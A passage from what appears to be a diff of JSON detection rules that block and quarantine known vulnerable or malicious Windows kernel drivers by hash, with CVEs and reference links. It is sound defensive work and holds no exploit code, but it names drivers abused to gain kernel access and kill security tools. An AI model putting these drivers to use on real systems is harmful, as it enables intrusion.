[authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "59a6c8f3-81d6-51b7-a65e-2cb4970fd828", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985100Z", + "creation_date": "2026-03-23T11:45:29.985102Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985107Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "42de79eb237293befb1b954beaf92b832f947195e3c359048aaa464ead56b62d", + "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "59b0ec94-a57d-5ade-ad45-b89bb8d2777c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818846Z", + "creation_date": "2026-03-23T11:45:31.818849Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818857Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d4a58f058a2a1dfa89c48a813bbca325f850e90766f7061b664c1c7ea0077c2e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "59b9fdbd-9ee7-5799-bfe6-c3f22d1f82f8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814944Z", + "creation_date": "2026-03-23T11:45:31.814954Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814963Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34491f04384ba04126640ded17704d1aab2a1db415c93fbc718b6c680fc8a12b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "59c11618-9b7a-5c9c-9313-78e1fc587563", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824084Z", + "creation_date": "2026-03-23T11:45:31.824088Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824096Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "90e329a85e21dea3cb0726b2377e43bb2b7af4549caf6f8bd90526af4863b35c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "59c22c02-d921-5ffd-b1ab-6f577c9c0697", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619337Z", + "creation_date": "2026-03-23T11:45:29.619339Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619345Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82", + "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "59db818d-3cad-5d9e-a7a2-04a41591eb94", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823572Z", + "creation_date": "2026-03-23T11:45:30.823574Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823580Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f5f9c3e3bf7efab4013d1db04e09abc90f1c7e2eaf0709ab8dc75b1ab9c2ff91", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "59f0ef64-0889-5a83-b08a-ac2c3c625bd0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491033Z", + "creation_date": "2026-03-23T11:45:31.491037Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491045Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cde0c2744775258f44f1c282220501a98ad3f32566b77e926475c50477f1f653", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "59f2f54b-d430-5bc3-898b-508da5f424d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981506Z", + "creation_date": "2026-03-23T11:45:29.981508Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981513Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "af298d940b186f922464d2ef19ccfc129c77126a4f337ecf357b4fe5162a477c", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "59f4cb30-d3ac-57f5-b3bd-8578242f54ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607765Z", + 
"creation_date": "2026-03-23T11:45:29.607767Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607772Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aafb95a443911e4c67d4e45ffa83cca103c91b42915b81100534dc439bec0c1b", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a00cbc4-24b1-5572-9730-9edd2dc28ac4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825915Z", + "creation_date": "2026-03-23T11:45:30.825918Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825926Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "da2d5db1dde9313c86e08591f58fa10344ec32173d293376b8838cdf4206dda8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a034ef9-2cfb-5ae3-bd5b-00156639cee0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.986136Z", + "creation_date": "2026-03-23T11:45:29.986138Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.986144Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e6a7a497010579fde69cd52bed8de28db610c33bbc5ce0774459dcf64657b802", + "comment": "Vulnerable Kernel Driver (aka directio.sys) [https://www.loldrivers.io/drivers/a2c3f6e9-25a5-4b75-8c6b-ad2d4e155822/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a1fc55a-9f65-5213-9f99-a4e2e163a119", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828825Z", + "creation_date": "2026-03-23T11:45:30.828827Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.828832Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd96a63f6fdc50f67cd7cbc5e2bd8173c014254a80dd30f89474ac607f80a63a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a255d95-da22-5b78-8cfc-c2048fb34254", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823452Z", + "creation_date": "2026-03-23T11:45:30.823455Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823465Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c1ca510e02e5b44f0999db444da05d4b1883621043ca396b8a41e3271e84602", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a33df7c-5145-58a3-873a-369dc71a051e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969733Z", + "creation_date": "2026-03-23T11:45:29.969735Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969741Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a801e12c32c0eb197b3cc507d096afc16a32dca6bc71d080e1ae2c17ad13b2ca", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a383163-6778-524b-90fa-ff5513e087aa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817498Z", + "creation_date": "2026-03-23T11:45:31.817500Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817505Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "556356bb664b9f3a221075c070e3eddc0470eb5e38efaf2a8bdac6ed0c4a3159", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a402dbb-5c0c-50ef-8168-28b66a807f56", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462919Z", + "creation_date": "2026-03-23T11:45:30.462922Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462931Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f03f0fb3a26bb83e8f8fa426744cf06f2e6e29f5220663b1d64265952b8de1a1", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a409913-94aa-5b80-bcc7-41f272dfdfb0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": 
{ + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969768Z", + "creation_date": "2026-03-23T11:45:29.969770Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969775Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "60ae64ade82e9364e95f779bbf950571484aa833ece6837489329517012c7757", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a4957aa-f52d-57d5-a93d-c649dca517f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473484Z", + "creation_date": "2026-03-23T11:45:30.473488Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473497Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "baec06b150e0298136275860ecb0aae08a9bd731ef14d255fc729c4bd7e4d832", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] 
[authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a4fcbe9-01a9-55ef-9a40-87531ad89cea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831531Z", + "creation_date": "2026-03-23T11:45:30.831533Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831538Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fead8e6283e71d49cdf327f467bd26aa68db79434c82851be34e7652a20a5258", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a5c39f0-e244-5356-a900-4da6fb1636e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985339Z", + "creation_date": "2026-03-23T11:45:29.985340Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985346Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c9b49b52b493b53cd49c12c3fa9553e57c5394555b64e32d1208f5b96a5b8c6e", + "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a5f081d-c6ea-55a1-80e1-02928dc58158", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611079Z", + "creation_date": "2026-03-23T11:45:29.611081Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611086Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a50cf5d2189991851565fa73e205b0b56759de78ff415d0f2d3186fb6228b15f", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a5f3bbc-f802-55a4-997f-1e15288d46d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981745Z", + "creation_date": "2026-03-23T11:45:29.981747Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981753Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8dafe5f3d0527b66f6857559e3c81872699003e0f2ffda9202a1b5e29db2002e", + "comment": "Malicious Kernel Driver (aka daxin_blank4.sys) [https://www.loldrivers.io/drivers/f8bddc8b-49b9-41f7-a877-d15ec3f174f9/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a608dd0-ae3f-58a1-97cd-df397c6123f9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819930Z", + "creation_date": "2026-03-23T11:45:30.819932Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819937Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "647f209aac750ba26bda9836afa5ef1370e4a62b5c331606086b1c4c92e10841", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a675fe1-94f8-5d56-a4f5-ce1e2c156487", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818416Z", + "creation_date": "2026-03-23T11:45:30.818418Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818424Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "51f002ee44e46889cf5b99a724dd10cc2bd3e22545e2a2cb3bd6b1dd3af5ba11", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5a716bec-b6e8-5ab9-b90b-7f3111948cfa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
